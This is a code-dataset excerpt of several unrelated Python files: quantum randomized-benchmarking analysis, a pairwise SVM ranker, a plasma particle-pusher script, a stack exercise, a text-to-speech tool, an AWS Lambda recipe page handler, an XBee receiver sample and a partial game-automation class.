keys_in=list(plot_dicts),\n **params)\n\n\ndef get_rb_leakage_ibm_textstr(data_dict, fit_res=None, **params):\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n msmt_type = hlp_mod.get_param('msmt_type', data_dict, **params)\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n if not len(keys_out_container) or keys_out_container is None:\n keys_out_container = f'{mobjn}.{msmt_type}'\n textstr = 'IBM style:'\n p_value = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter value', data_dict,\n raise_error=True)\n p_stderr = hlp_mod.get_param(\n f'{keys_out_container}.depolarization parameter stderr', data_dict)\n textstr += f'\\np = {100*p_value:.4f}%'\n if p_stderr is not None:\n textstr += f'$\\pm$ {100*p_stderr:.3f}%'\n\n L_value = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style leakage value', data_dict,\n raise_error=True)\n textstr += f'\\nL = {100*L_value:.4f}%'\n L_stderr = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style leakage stderr', data_dict)\n if L_stderr is not None:\n textstr += f'$\\pm$ {100*L_stderr:.3f}%'\n\n S_value = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style seepage value', data_dict,\n raise_error=True)\n textstr += f'\\nS = {100*S_value:.4f}%'\n S_stderr = hlp_mod.get_param(\n f'{keys_out_container}.IBM-style seepage stderr', data_dict)\n if S_stderr is not None:\n textstr += f'$\\pm$ {100*S_stderr:.3f}%'\n return textstr\n\n\ndef get_rb_leakage_google_textstr(fit_res, **params):\n textstr = 'Google style:'\n textstr += ('\\n$p_{\\\\uparrow}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pu'].value*100,\n fit_res.params['pu'].stderr*100) +\n '\\n$p_{\\\\downarrow}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pd'].value*100,\n fit_res.params['pd'].stderr*100) +\n '\\n$p_0$' + ' = {:.2f}% $\\pm$ {:.2f}%\\n'.format(\n fit_res.params['p0'].value,\n fit_res.params['p0'].stderr))\n return textstr\n\n\ndef get_rb_regular_textstr(fit_res, epc_T1=None, **params):\n textstr = ('$r_{\\mathrm{Cl}}$' + ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n (1-fit_res.params['fidelity_per_Clifford'].value)*100,\n fit_res.params['fidelity_per_Clifford'].stderr*100))\n if epc_T1 is not None:\n textstr += ('\\n$r_{\\mathrm{coh-lim}}$ = ' +\n '{:.3f}%'.format(epc_T1*100))\n textstr += ('\\n' + 'p = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['p'].value*100, fit_res.params['p'].stderr*100))\n textstr += ('\\n' + r'$\\langle \\sigma_z \\rangle _{m=0}$ = ' +\n '{:.2f} $\\pm$ {:.2f}'.format(\n fit_res.params['Amplitude'].value +\n fit_res.params['offset'].value,\n np.sqrt(fit_res.params['offset'].stderr**2 +\n fit_res.params['Amplitude'].stderr**2)))\n return textstr\n\n\ndef get_cz_irb_textstr(fit_res, epc_T1=None, **params):\n suffix = params.get('suffix', 'RB')\n textstr = (f'$r_{{\\mathrm{{Cl}}, {{{suffix}}}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n (1-fit_res.params['fidelity_per_Clifford'].value)*100,\n fit_res.params['fidelity_per_Clifford'].stderr*100))\n if epc_T1 is not None:\n textstr += ('\\n$r_{\\mathrm{coh-lim}}$ = ' +\n '{:.3f}%'.format(epc_T1*100))\n textstr += (f'\\n$p_{{\\\\uparrow, {suffix}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pu'].value*100,\n fit_res.params['pu'].stderr*100) +\n f'\\n$p_{{\\\\downarrow, {suffix}}}$' +\n ' = {:.4f}% $\\pm$ {:.3f}%'.format(\n fit_res.params['pd'].value*100,\n fit_res.params['pd'].stderr*100))\n return textstr\n\n\ndef get_rb_textbox_properties(data_dict, fit_res, epc_T1=None,\n textstr_style=(), textstr='', **params):\n if len(textstr_style) != 0:\n textstr += '\\n'\n if 'regular' in textstr_style:\n textstr += get_rb_regular_textstr(fit_res, epc_T1, **params)\n if 'leakage_google' in textstr_style:\n textstr += get_rb_leakage_google_textstr(fit_res, **params)\n if 'leakage_ibm' in textstr_style:\n textstr += get_rb_leakage_ibm_textstr(data_dict, **params)\n if 'irb' in textstr_style:\n textstr += get_cz_irb_textstr(fit_res, **params)\n if len(textstr) == 0:\n raise NotImplementedError(f'The textstring style {textstr_style} '\n f'has not been implemented yet.')\n\n va = 'top'\n vp = -0.15\n ha = 'left'\n hp = -0.12\n\n return textstr, ha, hp, va, vp\n\n\ndef irb_gate_error(data_dict, keys_container_rb, keys_container_irb, **params):\n \"\"\"\n Calculates the average gate error from a set of RB-IRB measurements and\n saves it in data_dict.\n :param data_dict: OrderedDict containing the results of running rb_analysis\n node.\n :param params: keyword arguments:\n meas_obj_names (str): name of the measurement object\n for which to calculate average gate error.\n Should be correlation_object for a two-qubit RB.\n d (int): dimension of the Hilbert space\n interleaved_gate (str or int): the interleaved gate for which to\n calculate average gate error.\n\n Assumptions:\n - meas_obj_names, d, interleaved_gate must exist wither in data_dict,\n metadata, or params\n \"\"\"\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n d = hlp_mod.get_param('d', data_dict, raise_error=True, **params)\n interleaved_gate = hlp_mod.get_param(\n 'interleaved_gate', data_dict, raise_error=True, **params)\n if interleaved_gate == 4368:\n interleaved_gate = 'CZ'\n\n keys_out_container = hlp_mod.get_param('keys_out_container', data_dict,\n default_value='', **params)\n prb = hlp_mod.get_param(\n f'{keys_container_rb}.depolarization parameter value', data_dict,\n raise_error=True, **params)\n prb_err = hlp_mod.get_param(\n f'{keys_container_rb}.depolarization parameter stderr', data_dict,\n raise_error=True, **params)\n pirb = hlp_mod.get_param(\n f'{keys_container_irb}.depolarization parameter value', data_dict,\n raise_error=True, **params)\n pirb_err = hlp_mod.get_param(\n f'{keys_container_irb}.depolarization parameter stderr', data_dict,\n raise_error=True, **params)\n\n if not len(keys_out_container) or keys_out_container is None:\n keys_out_container = f'{mobjn}.average_gate_error_{interleaved_gate}'\n if mobjn not in keys_out_container:\n keys_out_container = f'{mobjn}.{keys_out_container}'\n hlp_mod.add_param(f'{keys_out_container}.value',\n ((d-1)/d)*(1 - pirb/prb),\n data_dict, **params)\n hlp_mod.add_param(f'{keys_out_container}.stderr',\n ((d-1)/d)*np.sqrt((pirb_err*prb)**2 +\n (prb_err*pirb)**2)/(prb**2),\n data_dict, **params)\n\n\ndef calc_rb_coherence_limited_fidelity(T1, T2, pulse_length, gate_decomp='HZ'):\n \"\"\"\n Formula from Asaad et al. (2016):\n https://www.nature.com/articles/npjqi201629\n\n Returns:\n F_cl (float): decoherence limited fildelity\n p (float): decoherence limited depolarization parameter\n \"\"\"\n # Np = 1.875 # Avg. number of gates per Clifford for XY decomposition\n # Np = 1.125 # Avg. number of gates per Clifford for HZ decomposition\n if gate_decomp == 'HZ':\n Np = 1.125\n elif gate_decomp == 'XY':\n Np = 1.875\n else:\n raise ValueError('Gate decomposition not recognized.')\n\n F_cl = (1/6*(3 + 2*np.exp(-1*pulse_length/(T2)) +\n np.exp(-pulse_length/T1)))**Np\n p = 2*F_cl - 1\n\n return F_cl, p\n\n\ndef get_meas_obj_coh_times(data_dict, extract_T2s=True, **params):\n mobjn = hlp_mod.get_measurement_properties(\n data_dict, props_to_extract=['mobjn'], **params)\n # Get from the hdf5 file any parameters specified in\n # params_dict and numeric_params.\n params_dict = {}\n s = 'Instrument settings.' + mobjn\n for trans_name in ['', '_ef']:\n if hlp_mod.get_param(f'{mobjn}.T1{trans_name}', data_dict) is None:\n params_dict[f'{mobjn}.T1{trans_name}'] = s + f'.T1{trans_name}'\n if hlp_mod.get_param(f'{mobjn}.T2{trans_name}', data_dict) is None:\n params_dict[f'{mobjn}.T2{trans_name}'] = s + (\n f'.T2_star{trans_name}' if extract_T2s else f'.T2{trans_name}')\n for trans_name in ['ge', 'ef']:\n if hlp_mod.get_param(f'{mobjn}.T1{trans_name}', data_dict) is None and \\\n hlp_mod.get_param(f'{mobjn}.T1{trans_name}', data_dict) is None:\n params_dict[f'{mobjn}.{trans_name}_sigma'] = \\\n s + f'.{trans_name}_sigma'\n params_dict[f'{mobjn}.{trans_name}_nr_sigma'] = \\\n s + f'.{trans_name}_nr_sigma'\n if len(params_dict) > 0:\n hlp_mod.get_params_from_hdf_file(data_dict, params_dict=params_dict,\n numeric_params=list(params_dict),\n **params)\n\n\ndef calculate_rb_confidence_intervals(\n nr_seeds, nr_cliffords, conf_level=0.68, depolariz_param=1,\n epsilon_guess=0.01, d=2):\n\n # From Helsen et al. (2017)\n # For each number of cliffords in nr_cliffords (array), finds epsilon\n # such that with probability greater than conf_level, the true value of\n # the survival probability, p_N_m, for a given N=nr_seeds and\n # m=nr_cliffords, is in the interval\n # [p_N_m_measured-epsilon, p_N_m_measured+epsilon]\n # See Helsen et al. (2017) for more details.\n\n # eta is the SPAM-dependent prefactor defined in Helsen et al. (2017)\n epsilon = []\n delta = 1-conf_level\n infidelity = (d-1)*(1-depolariz_param)/d\n\n for n_cl in nr_cliffords:\n if n_cl == 0:\n epsilon.append(0)\n else:\n if d == 2:\n V_short_n_cl = (13*n_cl*infidelity**2)/2\n V_long_n_cl = 7*infidelity/2\n V = min(V_short_n_cl, V_long_n_cl)\n else:\n V_short_n_cl = \\\n (0.25*(-2+d**2)/((d-1)**2)) * (infidelity**2) + \\\n (0.5*n_cl*(n_cl-1)*(d**2)/((d-1)**2)) * (infidelity**2)\n V1 = 0.25*((-2+d**2)/((d-1)**2))*n_cl*(infidelity**2) * \\\n depolariz_param**(n_cl-1) + ((d/(d-1))**2) * \\\n (infidelity**2)*(\n (1+(n_cl-1)*(depolariz_param**(2*n_cl)) -\n n_cl*(depolariz_param**(2*n_cl-2))) /\n (1-depolariz_param**2)**2 )\n V = min(V1, V_short_n_cl)\n H = lambda eps: (1/(1-eps))**((1-eps)/(V+1)) * \\\n (V/(V+eps))**((V+eps)/(V+1)) - \\\n (delta/2)**(1/nr_seeds)\n epsilon.append(optimize.fsolve(H, epsilon_guess)[0])\n return np.asarray(epsilon)\n\n\n","sub_path":"pycqed/analysis_v3/randomized_benchmarking_analysis.py","file_name":"randomized_benchmarking_analysis.py","file_ext":"py","file_size_in_byte":65189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"191991695","text":"import logging\n\nimport numpy as np\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.svm import LinearSVC\nfrom sklearn.utils import check_random_state\n\nfrom csrank.learner import Learner\nfrom csrank.util import print_dictionary\n\n\nclass PairwiseSVM(Learner):\n def __init__(\n self,\n C=1.0,\n tol=1e-4,\n normalize=True,\n fit_intercept=True,\n random_state=None,\n **kwargs,\n ):\n \"\"\" Create an instance of the PairwiseSVM model for any preference learner.\n\n Parameters\n ----------\n C : float, optional\n Penalty parameter of the error term\n tol : float, optional\n Optimization tolerance\n normalize : bool, optional\n If True, the data will be normalized before fitting.\n fit_intercept : bool, optional\n If True, the linear model will also fit an intercept.\n random_state : int, RandomState instance or None, optional\n Seed of the pseudorandom generator or a RandomState instance\n **kwargs\n Keyword arguments for the algorithms\n\n References\n ----------\n [1] Joachims, T. (2002, July). \"Optimizing search engines using clickthrough data.\", Proceedings of the eighth ACM SIGKDD international conference on Knowledge discovery and data mining (pp. 133-142). ACM.\n \"\"\"\n self.normalize = normalize\n self.C = C\n self.tol = tol\n self.logger = logging.getLogger(\"RankSVM\")\n self.random_state = random_state\n self.threshold_instances = int(1e10)\n self.fit_intercept = fit_intercept\n self.weights = None\n self.model = None\n\n def fit(self, X, Y, **kwargs):\n \"\"\"\n Fit a generic preference learning model on a provided set of queries.\n The provided queries can be of a fixed size (numpy arrays).\n\n Parameters\n ----------\n X : numpy array, shape (n_samples, n_objects, n_features)\n Feature vectors of the objects\n Y : numpy array, shape (n_samples, n_objects, n_features)\n Preferences in form of Orderings or Choices for given n_objects\n **kwargs\n Keyword arguments for the fit function\n\n \"\"\"\n self.random_state_ = check_random_state(self.random_state)\n _n_instances, self.n_objects_fit_, self.n_object_features_fit_ = X.shape\n x_train, y_single = self._convert_instances_(X, Y)\n if x_train.shape[0] > self.threshold_instances:\n self.model = LogisticRegression(\n C=self.C,\n tol=self.tol,\n fit_intercept=self.fit_intercept,\n random_state=self.random_state_,\n )\n self.logger.info(\"Logistic Regression model \")\n else:\n self.model = LinearSVC(\n C=self.C,\n tol=self.tol,\n fit_intercept=self.fit_intercept,\n random_state=self.random_state_,\n )\n self.logger.info(\"Linear SVC model \")\n\n if self.normalize:\n std_scalar = StandardScaler()\n x_train = std_scalar.fit_transform(x_train)\n self.logger.debug(\"Finished Creating the model, now fitting started\")\n\n self.model.fit(x_train, y_single)\n self.weights = self.model.coef_.flatten()\n if self.fit_intercept:\n self.weights = np.append(self.weights, self.model.intercept_)\n self.logger.debug(\"Fitting Complete\")\n\n def _predict_scores_fixed(self, X, **kwargs):\n assert X.shape[-1] == self.n_object_features_fit_\n self.logger.info(\n \"For Test instances {} objects {} features {}\".format(*X.shape)\n )\n if self.fit_intercept:\n scores = np.dot(X, self.weights[:-1])\n else:\n scores = np.dot(X, self.weights)\n self.logger.info(\"Done predicting scores\")\n return np.array(scores)\n\n def _convert_instances_(self, X, Y):\n raise NotImplementedError\n\n def set_tunable_parameters(self, C=1.0, tol=1e-4, **point):\n \"\"\"\n Set tunable parameters of the PairwiseSVM model to the values provided.\n\n Parameters\n ----------\n C : float\n Penalty parameter of the error term of the SVM classifier\n tol : float\n Optimization tolerance of the SVM classifier\n point: dict\n Dictionary containing parameter values which are not tuned for the network\n \"\"\"\n self.tol = tol\n self.C = C\n if len(point) > 0:\n self.logger.warning(\n \"This ranking algorithm does not support\"\n \" tunable parameters\"\n \" called: {}\".format(print_dictionary(point))\n )\n","sub_path":"csrank/core/pairwise_svm.py","file_name":"pairwise_svm.py","file_ext":"py","file_size_in_byte":4913,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"79737682","text":"import numpy as np\nfrom tools.writing import wp_dump\nfrom tools.plotting import *\nfrom pushers.boris_sdc import boris_SDC\nfrom pushers.coll import coll\n# from pushers.rel_col18 import implicit_coll\nfrom pushers.gauss_legendre import CollGaussLegendre\nfrom pushers.gauss_lobatto import CollGaussLobatto\n\nfrom penning import config\n\n\nsims = [10,20,40,80,160,320,640]\ntend = 10\n\nM = 3\nK_range = [2]\n\nc = 10\nq = 1\nlabel = \"A\"\n# gamma_max = 1.0000000000005\ngamma_max = 5.\nbeta_max = np.sqrt(1-1./gamma_max**2.)\nuy_max = beta_max*c\n\nconf = config(q=q,c=c)\n\nnew = True\n\nfor K in K_range:\n new = True\n for Nt in sims:\n dt = tend/Nt\n\n nq = 1\n\n pos = np.zeros((nq,3),dtype=np.float)\n vel = np.zeros((nq,3),dtype=np.float)\n\n vel[:,1] = np.linspace(uy_max/8,uy_max,nq)\n vel[:,2] = np.sqrt(1-1./gamma_max**2.)\n\n pos = np.array([[10.,0.,0.]])\n vel = np.array([[100.,0.,100.]])\n\n # gamma = gu(vel,c=c)\n # lfreq = -q*Bfield/(1*c*gamma)\n # larmor = vel[:,1]/gamma/lfreq\n # #larmor = 1*vel[:,1]/(-q*B)\n # pos[:,0] = larmor\n\n t = 0\n\n x_array = [pos]\n x2_array = [pos]\n v_array = [vel]\n t_array = [t]\n\n col = coll(CollGaussLobatto,dt,nq,K=K,M=M,predictor=True)\n rx_array = [np.linalg.norm(col.Rx,axis=1)]\n rv_array = [np.linalg.norm(col.Rv,axis=1)]\n\n # Collocation solution stuff\n # posc = np.copy(pos)\n # velc = np.copy(vel)\n # colc = coll(CollGaussLobatto,dt,nq,M=5,K=1,c=c,q=q)\n\n for ti in range(1,Nt+1):\n t = ti*dt\n\n pos, vel, col = boris_SDC(pos,vel,col,conf)\n # print(G(vel,c=c)/c*100)\n # posc, velc, colc = implicit_coll(posc,velc,colc)\n rx_array.append(np.linalg.norm(col.Rx,axis=1))\n rv_array.append(np.linalg.norm(col.Rv,axis=1))\n # x2_array.append(posc)\n x_array.append(pos)\n v_array.append(vel)\n t_array.append(t)\n\n # colc.calc_residual_2018(1)\n # col.calc_residual_2018(4)\n # errorx = np.abs(col.x[2:,0,:]-np.around(colc.x[2:,0,:],14))/np.abs(np.around(colc.x[2:,0,:],14))\n # errorf = np.abs(col.F[2:,0,:]-np.around(colc.F[2:,0,:],14))/np.abs(np.around(colc.F[2:,0,:],14))\n # erroru = np.abs(col.u[2:,0,:]-np.around(colc.u[2:,0,:],14))/np.abs(np.around(colc.u[2:,0,:],14))\n # print(\"Diff in x: {0}\".format(errorx))\n # print(\"Diff in F: {0}\".format(errorf))\n # print(\"Diff in u: {0}\".format(erroru))\n # print(\"SDC solution: {0}\".format(col.Rv))\n # print(\"Collocation solution: {0}\".format(colc.Rv))\n rx_array = np.array(rx_array)\n rv_array = np.array(rv_array)\n x_array = np.array(x_array)\n # x2_array = np.array(x2_array)\n v_array = np.array(v_array)\n t_array = np.array(t_array)\n\n if col.predictor == True:\n rhs = (M-1)*(K+1)*Nt\n else:\n rhs = (M-1)*K*Nt\n\n wp_dump(t_array,x_array,v_array,dt,\"sdc_M{0}K{1}_wp_{2}.h5\".format(M,K,label),rhs=rhs,new=new)\n new = False\n\n plot_xres(t_array,rx_array,\"sdc_M{0}K{1}_\".format(M,K)+str(Nt))\n plot_vres(t_array,rv_array,\"sdc_M{0}K{1}_\".format(M,K)+str(Nt))\n plot_isotraj(x_array,\"sdc_\"+str(Nt),label=\"sim\")\n # plot_isotraj(x2_array,\"col2_\"+str(Nt),label=\"sim\")\n plot_vel(t_array,v_array,\"sdc_\"+str(Nt),label=\"sim\")\n","sub_path":"projects/penning/rvv_sdc.py","file_name":"rvv_sdc.py","file_ext":"py","file_size_in_byte":3422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"398837782","text":"########## hamoon의 풀이 ##########\nimport sys\nsys.stdin = open('input1874.txt')\nT = int(input())\ns = [] # 스택 초기값 설정\nans = [] # 결과값 한번에 출력용 리스트 초기값 설정\ncount = 1 # 카운트 초기값 설정\nTOF = True # 수열을 만들수 있는지 여부 초기 상태값 설정\n# 입력받은 수열의 길이만큼 반복하면서\nfor i in range(T):\n num = int(input())\n # 입력받은 수가 count보다 크거나 같을 경우\n while count <= num:\n s.append(count) # 스택에 쌓는다.\n ans.append('+') # '+' 출력\n count += 1 # count횟수를 1 증가시킨다.\n \n # 입력받은 수가 count보다 작을 경우\n # 만약 스택의 마지막 인덱스와 입력받은 값이 같다면\n if s[-1] == num:\n s.pop() # 스택의 마지막 인덱스를 뺀다.\n ans.append('-') # '-'출력\n # 스택의 마지막 인덱스와 입력받은 값이 다르다면\n else:\n TOF = False # 상태값을 False로 변경\n# 해당 수열을 만들 수 없으므로 'NO' 출력\nif TOF == False:\n print('NO')\n# 만들 수 있는 경우 결과값 출력\nelse:\n for i in ans:\n print(i)","sub_path":"알고리즘 스터디/큐&스택/백준_1874_스택수열.py","file_name":"백준_1874_스택수열.py","file_ext":"py","file_size_in_byte":1210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"608608011","text":"#!/usr/bin/env python3\n\n\nimport argparse\nimport os, os.path\nimport random\nimport sys\nimport subprocess\nimport hashlib\nfrom gtts import gTTS\n\ntopics = []\n\ndef get_text_hash(text):\n return hashlib.md5(text.encode(\"utf-8\")).hexdigest()\n\n\ndef get_topics(path):\n for root, dirs, files in os.walk(path):\n return files\n\n\ndef get_random_sentence(topic):\n with open(topic) as file:\n sentences = [line for line in file]\n audio_files = []\n for sentence in sentences:\n audio_files.append(get_text_to_speech_file(sentence))\n return random.choice(audio_files)\n\n\ndef get_text_to_speech_file(text):\n hashstr = get_text_hash(text)\n tmp_file_path = '/tmp/{path}.mp3'.format(path=hashstr)\n if not os.path.isfile(tmp_file_path):\n tts = gTTS(text=text, lang=\"es\")\n tts.save(tmp_file_path)\n return tmp_file_path\n\n\ndef reproduce_file(_file):\n subprocess.call([\"cvlc\", \"--play-and-exit\", _file], stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-t\", \"--text\", type=str, help=\"Text to reproduce\")\n parser.add_argument(\"-r\", \"--random\", action=\"store_true\", help=\"Reproduce random sentence from files in ./topics\")\n parser.add_argument(\"-w\", \"--what\", type=str, help=\"Specify topic to reproduce random sentence\")\n parser.add_argument(\"-g\", \"--generate\", action=\"store_true\", help=\"Generate mp3 files for precharged sentences\")\n parser.add_argument(\"-l\", \"--list\", action=\"store_true\", help=\"List available topics\")\n args = parser.parse_args()\n args = vars(args) \n\n myself = os.path.abspath(sys.argv[0])\n dir = os.path.dirname(myself)\n\n if args[\"text\"]:\n text = args[\"text\"]\n reproduce_file(get_text_to_speech_file(text))\n exit\n\n if args[\"random\"]:\n topics = get_topics(dir + '/topics')\n if args[\"what\"]:\n what = args[\"what\"]\n exist = False\n for item in topics:\n #print(item)\n if what in item:\n audio_file = get_random_sentence(dir + '/topics/' + item)\n exist = True\n if not exist:\n print (\"Choosen topic doesn't exist\")\n quit()\n else:\n audio_file = get_random_sentence(dir + '/topics/' + random.choice(topics))\n reproduce_file(audio_file)\n exit\n\n if args[\"generate\"]:\n topics = get_topics(dir + '/topics')\n for topic in topics:\n with open(dir + '/topics/' + random.choice(topics)) as file:\n sentences = [line for line in file]\n for sentence in sentences:\n generated_file = get_text_to_speech_file(sentence)\n print (\"Creating file %s...\" %generated_file)\n exit\n\n if args[\"list\"]:\n topics = get_topics(dir + '/topics')\n print (\"This is the list of available topics:\")\n for item in topics:\n print (item[:-4])\n exit\n\n","sub_path":"speech/speech.py","file_name":"speech.py","file_ext":"py","file_size_in_byte":2765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"345564337","text":"# coding: utf-8\n\nimport time\nfrom os import path\nimport decimal\nfrom logging import getLogger\n\nimport boto3\nimport rds_config\nimport pymysql\nfrom jinja2 import Environment, FileSystemLoader\n\nlogger = getLogger()\nenv = Environment(loader=FileSystemLoader(path.join(path.dirname(__file__), 'template'), encoding='utf8'))\n\nrds_host = \"recipe.csuoosoe1wmb.us-west-2.rds.amazonaws.com\"\nname = rds_config.db_username\npassword = rds_config.db_password\ndb_name = rds_config.db_name\n\ndef handle(event, context):\n # init\n recipe_id = event[\"pathParameters\"][\"id\"]\n result = {}\n\n # set query parameters\n selected_trouble = 0\n selected_cook_time = 0\n if event[\"queryStringParameters\"] is not None and \"trouble\" in event[\"queryStringParameters\"]:\n selected_trouble = int(event[\"queryStringParameters\"][\"trouble\"])\n result[\"selected_trouble\"] = selected_trouble\n if event[\"queryStringParameters\"] is not None and \"cook_time\" in event[\"queryStringParameters\"]:\n selected_cook_time = int(event[\"queryStringParameters\"][\"cook_time\"])\n result[\"selected_cook_time\"] = selected_cook_time\n\n # connect DB\n connect = pymysql.connect(rds_host, user=name, passwd=password, db=db_name, charset='utf8', connect_timeout=5)\n cursor = connect.cursor() \n\n # get recipe detail\n sql = 'select recipe_id, recipe_name, comment, cook_time, serving, image_name'\n sql += ' from recipes'\n sql += ' where recipe_id = %s'\n cursor.execute(sql, (recipe_id,))\n for row in cursor:\n result[\"recipe_detail\"] = {\n \"recipe_id\": row[0],\n \"recipe_name\": row[1],\n \"comment\": row[2],\n \"cook_time\": row[3],\n \"serving\": row[4],\n \"image_name\": row[5]\n }\n\n # get directions\n sql = 'select direction_comment from directions'\n sql += ' where recipe_id = %s'\n sql += ' order by direction_sequence'\n cursor.execute(sql, (recipe_id,))\n result[\"directions\"] = []\n for row in cursor:\n direction = {\n \"direction_comment\": row[0]\n }\n result[\"directions\"].append(direction)\n\n # get ingredients\n sql = \"select f.food_name, f.category_id, i.ingredient_quantity\"\n sql += \" from ingredients i\"\n sql += \" join foods f on i.food_id = f.food_id\"\n sql += \" where i.recipe_id = %s\"\n sql += \" order by f.category_id\"\n cursor.execute(sql, (recipe_id,))\n result[\"ingredients\"] = []\n for row in cursor:\n ingredient = {\n \"food_name\": row[0],\n \"ingredient_category\": row[1],\n \"ingredient_quantity\": row[2]\n }\n result[\"ingredients\"].append(ingredient)\n\n # set troubles for sidemenu\n sql = 'select trouble_id, trouble_name from troubles'\n cursor.execute(sql)\n result[\"troubles\"] = []\n for row in cursor:\n trouble = {\n \"trouble_id\": row[0],\n \"trouble_name\": row[1]\n }\n result[\"troubles\"].append(trouble)\n\n # set cook_time for side menu\n result[\"cook_times\"] = [5, 10, 15, 20, 30, 45]\n\n # close DB\n cursor.close()\n connect.close()\n \n # set return body\n template = env.get_template('recipe.html')\n html = template.render(result=result)\n\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Content-Type\": \"text/html\",\n \"Access-Control-Allow-Headers\":\"Content-Type,X-Amz-Date,Authorization\",\n \"Access-Control-Allow-Methods\":\"GET\",\n \"Access-Control-Allow-Origin\": \"*\"\n },\n \"body\": html\n }\n","sub_path":"functions/getRecipe/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3600,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"101664576","text":"# Copyright 2020, Digi International Inc.\n#\n# Permission to use, copy, modify, and/or distribute this software for any\n# purpose with or without fee is hereby granted, provided that the above\n# copyright notice and this permission notice appear in all copies.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.\n\nfrom digi.xbee.models.mode import APIOutputModeBit\nfrom digi.xbee.util import utils\nfrom digidevice import xbee\n\n\ndef main():\n print(\" +-------------------------------------------+\")\n print(\" | XBee Gateway Receive Explicit Data Sample |\")\n print(\" +-------------------------------------------+\\n\")\n\n device = xbee.get_device()\n\n try:\n device.open()\n\n device.set_api_output_mode_value(\n APIOutputModeBit.calculate_api_output_mode_value(\n device.get_protocol(), {APIOutputModeBit.EXPLICIT}))\n\n def explicit_data_callback(explicit_xbee_message):\n print(\"From %s >> %s\"\n % (explicit_xbee_message.remote_device.get_64bit_addr(),\n explicit_xbee_message.data.decode()))\n print(\" - Source endpoint: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.source_endpoint)))\n print(\" - Destination endpoint: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.dest_endpoint)))\n print(\" - Cluster ID: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.cluster_id)))\n print(\" - Profile ID: %s\"\n % utils.hex_to_string(utils.int_to_length(explicit_xbee_message.profile_id)))\n\n device.flush_queues()\n device.add_expl_data_received_callback(explicit_data_callback)\n\n print(\"Waiting for data in explicit format...\\n\")\n\n input()\n\n finally:\n if device.is_open():\n device.close()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"samples/xbee/communication/explicit/ReceiveExplicitDataSample/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"230373748","text":"from os import getcwd, listdir\nfrom sys import path\n\nfrom foo.pictureR import pictureFind\nfrom foo.win import toast\nfrom common2 import adb\n\nclass Task:\n def __init__(self, cwd, ico, listGoTo):\n self.cwd = cwd\n self.switch = False\n self.icon = ico\n #self.screenShot = self.cwd + '/bin/adb/arktemp.png'\n self.task = pictureFind.picRead(self.cwd + \"/res/panel/other/task.png\")\n self.get = pictureFind.picRead(self.cwd + \"/res/panel/other/get.png\")\n self.daySel = pictureFind.picRead(self.cwd + \"/res/panel/other/dailyTaskSelect.png\")\n self.actSel = pictureFind.picRead(self.cwd + \"/res/panel/other/actSelect.png\")\n self.weekUnSel = pictureFind.picRead(self.cwd + \"/res/panel/other/weeklyTaskUnSelect.png\")\n self.weekSel = pictureFind.picRead(self.cwd + \"/res/panel/other/weeklyTaskSelect.png\")\n self.back = pictureFind.picRead(self.cwd + '/res/panel/other/back.png')\n self.rewardFinish = pictureFind.picRead(self.cwd + '/res/panel/other/rewardFinish.png')\n self.collectAll = pictureFind.picRead(self.cwd + '/res/panel/other/collectAll.png')\n\n self.listGoTo = listGoTo\n self.mainpage = self.listGoTo[0]\n self.home = self.listGoTo[1]\n self.mainpageMark = self.listGoTo[2]\n\n def goToMainpage(self):\n listGoToTemp = self.listGoTo.copy()\n tryCount = 0\n while self.switch:\n screenshot = adb.getScreen_std()\n for eachStep in listGoToTemp:\n bInfo = pictureFind.matchImg(screenshot, eachStep)\n if bInfo != None:\n listGoToTemp.remove(eachStep)\n break\n else:\n listGoToTemp = self.listGoTo.copy()\n tryCount += 1\n if tryCount > 5:\n return False\n\n if bInfo != None:\n if bInfo['obj'] == 'act.png':\n return True\n else:\n 